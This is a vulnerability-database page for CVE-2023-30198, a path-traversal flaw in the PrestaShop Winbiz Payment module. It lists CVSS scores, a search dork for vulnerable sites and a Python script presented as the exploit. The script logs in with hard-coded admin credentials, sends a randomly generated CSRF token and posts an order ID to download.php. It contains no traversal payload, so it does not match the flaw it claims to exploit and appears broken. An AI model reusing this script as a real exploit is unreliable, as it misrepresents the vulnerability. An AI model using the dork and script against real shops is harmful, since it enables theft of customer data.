Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtAmirhossein Bahramizadeh1337DAY-ID-38817
HistoryJun 26, 2023 - 12:00 a.m.

PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory

2023-06-2600:00:00
Amirhossein Bahramizadeh
0day.today
145
prestashop
winbiz payment
vulnerability

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.02

Percentile

89.1%

JSON
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198

import requests
import string
import random

# The base URL of the vulnerable site
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The ID of the order to download
order_id = 1234

# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id

# The session cookies to use for the requests
session_cookies = None

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)

# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)

Related

cve 1
cvelist 1
prion 1
cnvd 1
packetstorm 1
nvd 1
exploitdb 1
cve
cve
CVE-2023-30198
2023-06-12 17:15:09
cvelist
cvelist
CVE-2023-30198
2023-06-12 00:00:00
prion
prion
Improper access control
2023-06-12 17:15:00
cnvd
cnvd
PrestaShop path traversal vulnerability (CNVD-2023-49841)
2023-06-14 00:00:00
packetstorm
packetstorm
PrestaShop Winbiz Payment Improper Limitation
2023-06-27 00:00:00
nvd
nvd
CVE-2023-30198
2023-06-12 17:15:09
exploitdb
exploitdb
PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
2023-06-26 00:00:00

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.02

Percentile

89.1%

JSON
Related for 1337DAY-ID-38817
cve1cvelist1prion1cnvd1packetstorm1nvd1exploitdb1